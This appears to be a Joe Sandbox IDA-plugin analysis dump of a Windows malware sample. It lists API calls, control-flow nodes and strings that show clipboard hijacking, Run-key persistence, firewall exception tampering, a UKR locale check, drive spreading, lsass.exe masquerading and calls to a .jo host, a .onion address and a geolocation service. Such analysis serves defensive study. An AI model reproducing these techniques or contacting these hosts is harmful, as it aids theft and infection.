9a6773 GetLastError 7035->7038 7039 9a6405 7035->7039 7036 9a679d 7036->7008 7037 9a3410 HeapFree 7037->7036 7038->7051 7040 9a640b lstrlenA 7039->7040 7041 9a641d lstrlenA 7039->7041 7040->7041 7043 9a6566 7041->7043 7044 9a674e GetLastError 7043->7044 7046 9a6573 7043->7046 7044->7051 7045 9a6597 7047 9a6737 GetLastError 7045->7047 7048 9a65d7 7045->7048 7046->7045 7062 9a34d0 7046->7062 7047->7051 7050 9a672a GetLastError 7048->7050 7052 9a6602 _longjmp 7048->7052 7050->7051 7051->7036 7051->7037 7052->7051 7053 9a34a0 _longjmp 4 API calls 7052->7053 7054 9a66a1 7053->7054 7054->7051 7055 9a66ed 7054->7055 7056 9a3410 HeapFree 7054->7056 7055->7051 7057 9a3410 HeapFree 7055->7057 7056->7055 7057->7051 7058->7024 7059->7026 7060->7028 7061->7030 7064 9a34da 7062->7064 7063 9a352d memmove 7065 9a34ea 7063->7065 7064->7063 7064->7065 7068 9a3440 7064->7068 7065->7046 7069 9a344d 7068->7069 7070 9a3330 _longjmp 3 API calls 7069->7070 7071 9a3469 7069->7071 7072 9a3476 Sleep 7069->7072 7070->7069 7071->7063 7071->7065 7072->7069 7072->7071 7073->6472 7075 9aeb42 7074->7075 7076 9aeb4e WaitForSingleObject TerminateThread CloseHandle 7075->7076 7077 9aeb73 7075->7077 7076->7077 7077->6477 7077->6478 7078->6469 7080 9afcd6 OpenClipboard 7079->7080 7081 9afd5c Sleep 7080->7081 7082 9afce2 GetClipboardData 7080->7082 7081->7080 7083 9afd1c GetClipboardData 7082->7083 7084 9afcf3 GlobalLock 7082->7084 7085 9afd2d GlobalLock 7083->7085 7086 9afd56 CloseClipboard 7083->7086 7084->7083 7087 9afd06 GlobalUnlock 7084->7087 7085->7086 7089 9afd40 GlobalUnlock 7085->7089 7086->7081 7102 9af660 strlen 7087->7102 7130 9af010 wcslen 7089->7130 7172 9b01e0 _wfopen fseek ftell fclose 7093->7172 7095 9b1115 ExitThread 7097 9b1105 Sleep 7099 9b1025 7097->7099 7099->7095 7099->7097 7100 9b1092 GetVolumeInformationW 7099->7100 7101 9b0b30 47 API calls 7099->7101 7173 9b0870 GetLogicalDrives 7099->7173 7179 9b0790 7099->7179 7100->7099 7101->7099 7111 9af68b 7102->7111 7105 9afc90 _mbsstr 7107 9af84a 7105->7107 7106 9afc90 _mbsstr 7108 9af8e1 7106->7108 7109 9afc90 _mbsstr 7107->7109 7114 9af7f7 7107->7114 7110 9af942 isalpha 7108->7110 7112 9af7e5 7108->7112 7115 9af97a 7108->7115 7109->7114 7110->7108 7113 9af958 isdigit 7110->7113 7111->7112 7111->7114 7158 9afc90 7111->7158 7112->7083 7113->7108 7113->7112 7114->7106 7114->7112 7116 9afc90 _mbsstr 7115->7116 7117 9afaff 7116->7117 7118 9afc90 _mbsstr 7117->7118 7119 9afb1b 7118->7119 7120 9afc90 _mbsstr 7119->7120 7121 9afb49 7120->7121 7122 9afc90 _mbsstr 7121->7122 7124 9afbcc 6 API calls 7121->7124 7123 9afb94 7122->7123 7127 9afc90 _mbsstr 7123->7127 7124->7112 7126 9afc6e EmptyClipboard SetClipboardData CloseClipboard 7124->7126 7126->7112 7128 9afbb0 7127->7128 7129 9afc90 _mbsstr 7128->7129 7129->7124 7131 9af03b 7130->7131 7132 9af195 7131->7132 7139 9af1a7 7131->7139 7162 9af640 wcsstr 7131->7162 7132->7086 7134 9af1cd 7134->7139 7163 9af640 wcsstr 7134->7163 7137 9af1fa 7137->7139 7164 9af640 wcsstr 7137->7164 7139->7132 7165 9af640 wcsstr 7139->7165 7140 9af291 7140->7132 7141 9af2f5 iswalpha 7140->7141 7143 9af32f 7140->7143 7141->7140 7142 9af30c iswdigit 7141->7142 7142->7132 7142->7140 7166 9af640 wcsstr 7143->7166 7145 9af4b4 7167 9af640 wcsstr 7145->7167 7147 9af4d0 7168 9af640 wcsstr 7147->7168 7149 9af4fe 7152 9af581 6 API calls 7149->7152 7169 9af640 wcsstr 7149->7169 7151 9af549 7170 9af640 wcsstr 7151->7170 7152->7132 7154 9af622 EmptyClipboard SetClipboardData CloseClipboard 7152->7154 7154->7132 7156 9af565 7171 9af640 wcsstr 7156->7171 7161 9afcb0 _mbsstr 7158->7161 7160 9af81d 7160->7105 7160->7114 7161->7160 7162->7134 7163->7137 7164->7139 7165->7140 7166->7145 7167->7147 7168->7149 7169->7151 7170->7156 7171->7152 7172->7099 7178 9b089d 7173->7178 7174 9b08ac RegOpenKeyExW 7176 9b08ce RegQueryValueExW 7174->7176 7174->7178 7175 9b0916 7175->7099 7177 9b090a RegCloseKey 7176->7177 7176->7178 7177->7178 7178->7174 7178->7175 7178->7177 7180 9b07e9 7179->7180 7181 9b07ac 7179->7181 7180->7099 7185 9b07f0 GetDriveTypeW 7181->7185 7184 9b07db lstrcpyW 7184->7180 7186 9b0818 7185->7186 7189 9b07cf 7185->7189 7187 9b082c QueryDosDeviceW 7186->7187 7186->7189 7188 9b0846 StrCmpNW 7187->7188 7187->7189 7188->7189 7189->7180 7189->7184
              APIs
              • Sleep.KERNELBASE(000007D0,?,?,?,009B43AE,00000000,?,0000000A), ref: 009B1374
              • FindWindowA.USER32(f5d4s54s4sds5d5d5d,00000000), ref: 009B13A7
              • Sleep.KERNEL32(0000C350), ref: 009B13C5
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B13D0
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B13E0
              • MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 009B1414
              • Sleep.KERNEL32(00000FA0), ref: 009B141F
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B142A
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B143A
              • Sleep.KERNEL32(00000FA0), ref: 009B1445
              • DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 009B1450
              • Sleep.KERNEL32(00002710), ref: 009B145D
              • DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 009B1468
              • Sleep.KERNEL32(00001770), ref: 009B1473
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B1483
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B148E
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B149E
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B14A9
              • Sleep.KERNEL32(00000BB8), ref: 009B14B4
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B14BF
              • Sleep.KERNEL32(00000BB8), ref: 009B14CA
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B14DA
              • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36,00000000,00000000,00000000,00000000), ref: 009B14ED
              • DeleteFileW.KERNEL32(w4twywyw4yw4yw4yw4y), ref: 009B14FE
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B1516
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B1526
              • Sleep.KERNEL32(00001388), ref: 009B1531
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B153C
              • Sleep.KERNEL32(00000BB8), ref: 009B1547
              • DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 009B1552
              • InternetOpenUrlA.WININET(00000000,http://www.48838389493.jo/,00000000,00000000,00000000,00000000), ref: 009B156C
              • Sleep.KERNEL32(000007D0), ref: 009B157D
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B15BD
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B15C8
              • Sleep.KERNEL32(000007D0), ref: 009B15D3
              • MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 009B15E3
              • Sleep.KERNEL32(00000FA0), ref: 009B15EE
              • DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 009B15F9
              • InternetCloseHandle.WININET(00000000), ref: 009B1608
              • DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 009B1613
              • Sleep.KERNEL32(00001B58), ref: 009B161E
              • InternetCloseHandle.WININET(00000000), ref: 009B162B
              • Sleep.KERNEL32(00002710), ref: 009B1636
              • ShowWindow.USER32(00000000,00000001), ref: 009B1645
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B1650
              • SetForegroundWindow.USER32(00000000), ref: 009B165D
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B1668
              • CloseWindow.USER32(00000000), ref: 009B1675
              • MoveFileA.KERNEL32(f5d4s54s4sds5d5d5d,3r3hr8h38h8h38f8hff), ref: 009B1685
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B16CB
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B16D6
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B16E6
              • Sleep.KERNEL32(000007D0), ref: 009B16F1
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B16FC
              • DeleteFileA.KERNEL32(3r3hr8h38h8h38f8hff), ref: 009B1707
              • FindWindowA.USER32(3rvr3r3bru3urbu3rbub,00000000), ref: 009B1714
              • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36,00000000,00000000,00000000,00000000), ref: 009B172D
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B1750
              • Sleep.KERNEL32(000007D0), ref: 009B175B
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B176B
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B1776
              • InternetOpenUrlA.WININET(00000000,http://www.48838389493.jo/,00000000,00000000,00000000,00000000), ref: 009B1790
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B17AF
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B17BA
              • Sleep.KERNEL32(00001388), ref: 009B17C5
              • MoveFileW.KERNEL32(w4yw4t4tw4twyw4y,e5u5eue5ue5ue5ue5u), ref: 009B17D5
              • MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 009B17E5
              • Sleep.KERNEL32(00000FA0), ref: 009B17F0
              • DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 009B17FB
              • InternetCloseHandle.WININET(00000000), ref: 009B1808
              • Sleep.KERNEL32(00000DAC), ref: 009B1813
              • InternetCloseHandle.WININET(00000000), ref: 009B1820
              • Sleep.KERNEL32(00001388), ref: 009B182B
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B1848
              • ShowWindow.USER32(00000000,00000000), ref: 009B1857
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B1862
              • SetForegroundWindow.USER32(00000000), ref: 009B186F
              • Sleep.KERNEL32(00000DAC), ref: 009B187A
              • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36,00000000,00000000,00000000,00000000), ref: 009B188D
              • InternetOpenUrlA.WININET(00000000,http://www.48838389493.jo/,00000000,00000000,00000000,00000000), ref: 009B18BA
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B18D4
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B18E4
              • Sleep.KERNEL32(00000BB8), ref: 009B18EF
              • DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 009B18FA
              • InternetCloseHandle.WININET(00000000), ref: 009B1907
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B1912
              • Sleep.KERNEL32(00000064), ref: 009B191A
              • MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 009B192A
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B1935
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B1945
              • DeleteFileA.KERNEL32(3r3hr8h38h8h38f8hff), ref: 009B1950
              • Sleep.KERNEL32(000007D0), ref: 009B195B
              • InternetCloseHandle.WININET(00000000), ref: 009B1968
              • FindWindowA.USER32(3r3hr8h38h8h38f8hff,00000000), ref: 009B199B
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B19BA
              • Sleep.KERNEL32(000007D0), ref: 009B19C5
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B19D0
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B19E0
              • Sleep.KERNEL32(00001388), ref: 009B19EB
              • DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 009B19F6
              • Sleep.KERNEL32(00001388), ref: 009B1A01
              • PathFileExistsA.SHLWAPI(3rvr3r3bru3urbu3rbub), ref: 009B1A20
              • DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 009B1A2F
              • Sleep.KERNEL32(00000FA0), ref: 009B1A3A
              • DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 009B1A45
              • Sleep.KERNEL32(000001F4), ref: 009B1A50
              • MoveFileW.KERNEL32(w4yw4t4tw4twyw4y,w4twywyw4yw4yw4yw4y), ref: 009B1A60
              • FindWindowA.USER32(38fh83hf83hf83hf38h,00000000), ref: 009B1A6D
              • Sleep.KERNEL32(00001388), ref: 009B1A8B
              • DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 009B1A96
              • SetForegroundWindow.USER32(00000000), ref: 009B1AA3
              • Sleep.KERNEL32(000001F4), ref: 009B1AAE
              • ShowWindow.USER32(00000000,00000001), ref: 009B1ABD
              • Sleep.KERNEL32(00003A98), ref: 009B1AC8
              • MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,3rvr3r3bru3urbu3rbub), ref: 009B1AD8
              • DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 009B1AE3
              • ShowWindow.USER32(00000000,00000000), ref: 009B1AF2
              • Sleep.KERNEL32(000001F4), ref: 009B1AFD
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B1B08
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 009B1B3F
              • Sleep.KERNEL32(00001388), ref: 009B1B4A
              • MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 009B1B5A
              • PathFileExistsW.KERNELBASE(w4tw4yw4yw4tw4t), ref: 009B1B67
              • MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 009B1BA6
              • Sleep.KERNEL32(00001388), ref: 009B1BB3
              • FindWindowA.USER32(3r3hr8h38h8h38f8hff,00000000), ref: 009B1BC0
              • DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 009B1BDA
              • SetForegroundWindow.USER32(00000000), ref: 009B1BE7
              • MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 009B1BF7
              • SetFocus.USER32(00000000), ref: 009B1C04
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B1C0F
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B1C1A
              • Sleep.KERNEL32(00000BB8), ref: 009B1C25
              • Sleep.KERNEL32(000001F4), ref: 009B1C57
              • MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 009B1C67
              • Sleep.KERNEL32(000003E8), ref: 009B1C72
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 009B1C7D
              • Sleep.KERNELBASE(000001F4), ref: 009B1C9E
              • ExitProcess.KERNEL32 ref: 009B1CC0
              • CreateMutexA.KERNELBASE(00000000,00000000,?), ref: 009B205F
              • GetLastError.KERNEL32 ref: 009B206B
              • ExitProcess.KERNEL32 ref: 009B207A
              • PathFileExistsW.KERNELBASE(w4tw4yw4yw4tw4t), ref: 009B20BF
              • MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 009B20D7
              • Sleep.KERNEL32(00001388), ref: 009B20E2
              • CopyFileA.KERNEL32(f5d4s54s4sds5d5d5d,3r3hr8h38h8h38f8hff,00000000), ref: 009B20F4
              • MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 009B2104
              • MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 009B213B
              • DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 009B2146
              • Sleep.KERNEL32(000007D0), ref: 009B2153
              • FindWindowA.USER32(3r3hr8h38h8h38f8hff,00000000), ref: 009B2160
              • MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 009B217F
              • CopyFileA.KERNEL32(f5d4s54s4sds5d5d5d,3r3hr8h38h8h38f8hff,00000000), ref: 009B2191
              • MoveFileW.KERNEL32(w4yw4t4tw4twyw4y,w4twywyw4yw4yw4yw4y), ref: 009B21A1
              • DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 009B21AC
              • MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 009B21BC
              • Sleep.KERNEL32(00002710), ref: 009B21C7
              • CopyFileA.KERNEL32(f5d4s54s4sds5d5d5d,3r3hr8h38h8h38f8hff,00000000), ref: 009B2200
              • MoveFileW.KERNEL32(e5u5eue5ue5ue5ue5u,w4yw4t4tw4twyw4y), ref: 009B2210
              • MoveFileW.KERNEL32(w4yw4t4tw4twyw4y,w4twywyw4yw4yw4yw4y), ref: 009B2220
              • FindWindowA.USER32(f5d4s54s4sds5d5d5d,00000000), ref: 009B222F
              • MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 009B2252
              • Sleep.KERNEL32(00001F40), ref: 009B225D
              • DeleteFileW.KERNEL32(e5u5eue5ue5ue5ue5u), ref: 009B2268
              • MoveFileA.KERNEL32(3r3hr8h38h8h38f8hff,3rvr3r3bru3urbu3rbub), ref: 009B2278
              • Sleep.KERNEL32(000007D0), ref: 009B2283
              • MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 009B2293
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: File$Sleep$Delete$Move$Window$Internet$CloseFind$HandleOpen$ForegroundShow$CopyExistsPath$ExitProcess$CreateErrorFocusLastMutex
              • String ID: %ls:*:Enabled:%ls$%ls:Zone.Identifier$%ls\%d%d%d$%ls\%ls$%s%s$%s%s$,$2$38fh83hf83hf83hf38h$3r3hr8h38h8h38f8hff$3rvr3r3bru3urbu3rbub$433u3t$6$B$Host Process for Windows Services$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36$P$SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$Software\Microsoft\Windows\CurrentVersion\Run\$X$Z$e5u5eue5ue5ue5ue5u$f5d4s54s4sds5d5d5d$http://7fv5nq57k4qvbrpt.onion/$http://www.48838389493.jo/$lsass.exe$lsass.exe$w4tw4yw4yw4tw4t$w4tw84thw4h8th8w4h8t$w4twywyw4yw4yw4yw4y$w4yw4t4tw4twyw4y$x#
              • API String ID: 2034191202-2691257556
              • Opcode ID: 8c745cba1a9e6ae576147c9e0c078caa88ddde6de68e96dbed575ddfb7ed1af6
              • Instruction ID: d7ec40b7cbee1e221e1c9e7c99a80e01d2aa627218b5fed1f17ab4e65564a2a6
              • Opcode Fuzzy Hash: 8c745cba1a9e6ae576147c9e0c078caa88ddde6de68e96dbed575ddfb7ed1af6
              • Instruction Fuzzy Hash: 84237071A68714EFD720ABA4DF4ABED7774BB89B25F014288F30AA61D0C7B05980DF51
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 468 9b0290-9b02c0 memset InternetOpenA 469 9b0339-9b0343 InternetCloseHandle 468->469 470 9b02c2-9b02e0 InternetOpenUrlA 468->470 471 9b0345-9b0348 469->471 472 9b032f-9b0333 InternetCloseHandle 470->472 473 9b02e2-9b030b InternetReadFile call 9b0350 470->473 472->469 473->472 476 9b030d-9b0329 strcmp 473->476 476->472 477 9b032b-9b032d 476->477 477->471
              APIs
              • memset.MSVCRT ref: 009B029E
              • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36,00000000,00000000,00000000,00000000), ref: 009B02B3
              • InternetOpenUrlA.WININET(00000000,http://api.wipmania.com/,00000000,00000000,00000000,00000000), ref: 009B02D3
              • InternetReadFile.WININET(00000000,?,00000063,?), ref: 009B02F0
                • Part of subcall function 009B0350: strchr.MSVCRT ref: 009B035B
              • strcmp.MSVCRT ref: 009B031F
              • InternetCloseHandle.WININET(00000000), ref: 009B0333
              • InternetCloseHandle.WININET(00000000), ref: 009B033D
              Strings
              • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36, xrefs: 009B02AE
              • http://api.wipmania.com/, xrefs: 009B02CA
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: Internet$CloseHandleOpen$FileReadmemsetstrchrstrcmp
              • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36$http://api.wipmania.com/
              • API String ID: 2867819534-3587109876
              • Opcode ID: e17693cc28a23536fd9b0c1f759b4289f3ba70090f084100a8ceeea271279129
              • Instruction ID: 8ff7e72f2cdf28cae866bf1596085d598d030f1db3cde4a091404831d3c11ebd
              • Opcode Fuzzy Hash: e17693cc28a23536fd9b0c1f759b4289f3ba70090f084100a8ceeea271279129
              • Instruction Fuzzy Hash: DA216071E44308AFEB20EBF0DE4AFDD77B8AB84B15F200618B6146B1C1D6756544DF50
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 478 9b0240-9b027c memset GetLocaleInfoA strcmp 479 9b027e-9b0280 478->479 480 9b0282 478->480 481 9b0284-9b0287 479->481 480->481
              APIs
              • memset.MSVCRT ref: 009B024E
              • GetLocaleInfoA.KERNELBASE(00000400,00000007,00000000,0000000A,?,?,?,00000000,?,0000000A), ref: 009B0263
              • strcmp.MSVCRT ref: 009B0272
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: InfoLocalememsetstrcmp
              • String ID: UKR
              • API String ID: 3255129521-64918367
              • Opcode ID: 280dc3e41dab86c2d922cbc3e6b3fff734c6c3d29339b7e8421956070383bbfc
              • Instruction ID: 1ae4a1d3394200a69906cd7b741de03c60374c62f63d7ca29c95dc624f0be78a
              • Opcode Fuzzy Hash: 280dc3e41dab86c2d922cbc3e6b3fff734c6c3d29339b7e8421956070383bbfc
              • Instruction Fuzzy Hash: 71E0D876E4430476DE00A6E09E07FDA372C5B92721F004150BB24561C2F5B0620CA7E3
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 291 9b2d0f-9b2d25 293 9b2d2b-9b2d40 Sleep 291->293 294 9b384d-9b3883 Sleep call 9b0140 RegOpenKeyExA 291->294 295 9b2d4a-9b2d56 293->295 304 9b3889-9b38de call 9b0140 RegSetValueExA call 9b0140 RegOpenKeyExA 294->304 305 9b39b8-9b39ee Sleep call 9b0140 RegOpenKeyExA 294->305 297 9b35bb-9b3688 Sleep memset ExpandEnvironmentStringsW rand * 3 wsprintfW * 2 CreateDirectoryW 295->297 298 9b2d5c-9b2d76 FindWindowA 295->298 302 9b3848 297->302 303 9b368e-9b36b1 Sleep CopyFileW 297->303 300 9b2d7c-9b2db7 DeleteFileA Sleep DeleteFileA MoveFileW 298->300 301 9b3477-9b3484 PathFileExistsW 298->301 306 9b2dc8-9b2dd2 300->306 310 9b348a-9b349f DeleteFileA 301->310 311 9b35a7-9b35b6 301->311 302->294 303->302 307 9b36b7-9b3723 Sleep wsprintfW SetFileAttributesW * 2 RegOpenKeyExW 303->307 344 9b3911-9b393c call 9b0140 RegOpenKeyExA 304->344 345 9b38e0-9b390b call 9b0140 RegCreateKeyExA 304->345 323 9b3b51-9b3b87 Sleep call 9b0140 RegOpenKeyExA 305->323 324 9b39f4-9b3b4b call 9b0140 * 7 RegSetValueExA * 7 RegCloseKey 305->324 312 9b2e17-9b2e9b Sleep DeleteFileW Sleep CopyFileA MoveFileW Sleep DeleteFileW InternetOpenA DeleteFileW 306->312 313 9b2dd4-9b2e15 Sleep MoveFileW * 2 Sleep DeleteFileA 306->313 314 9b3765-9b3785 RegOpenKeyExW 307->314 315 9b3725-9b375f wcslen RegSetValueExW RegCloseKey 307->315 318 9b34b0-9b34ba 310->318 311->295 325 9b2f8e-9b302b Sleep DeleteFileW InternetCloseHandle DeleteFileA CopyFileA MoveFileW CloseWindow MoveFileA 312->325 326 9b2ea1-9b2f0f MoveFileW Sleep DeleteFileW Sleep DeleteFileW InternetOpenUrlA Sleep 312->326 313->306 321 9b37c7-9b37e7 RegOpenKeyExW 314->321 322 9b3787-9b37c1 wcslen RegSetValueExW RegCloseKey 314->322 315->314 327 9b34d9-9b34fe Sleep FindWindowA 318->327 328 9b34bc-9b34d7 MoveFileW DeleteFileA 318->328 336 9b3829-9b383e call 9b0080 321->336 337 9b37e9-9b3823 wcslen RegSetValueExW RegCloseKey 321->337 322->321 359 9b3cea-9b3d2f Sleep CreateThread Sleep CreateThread Sleep 323->359 360 9b3b8d-9b3ce4 call 9b0140 * 7 RegSetValueExA * 7 RegCloseKey 323->360 324->323 331 9b3031-9b308f MoveFileW Sleep MoveFileW FindWindowA InternetOpenA 325->331 332 9b3285-9b328f 325->332 338 9b2f11-9b2f1b 326->338 339 9b2f76-9b2f88 InternetCloseHandle DeleteFileW 326->339 329 9b3563-9b356d 327->329 330 9b3500-9b355d DeleteFileA SetForegroundWindow SetFocus DeleteFileW MoveFileW Sleep CloseWindow Sleep 327->330 328->318 341 9b357e-9b3588 329->341 330->329 342 9b313f-9b3170 InternetCloseHandle CopyFileA Sleep 331->342 343 9b3095-9b30d7 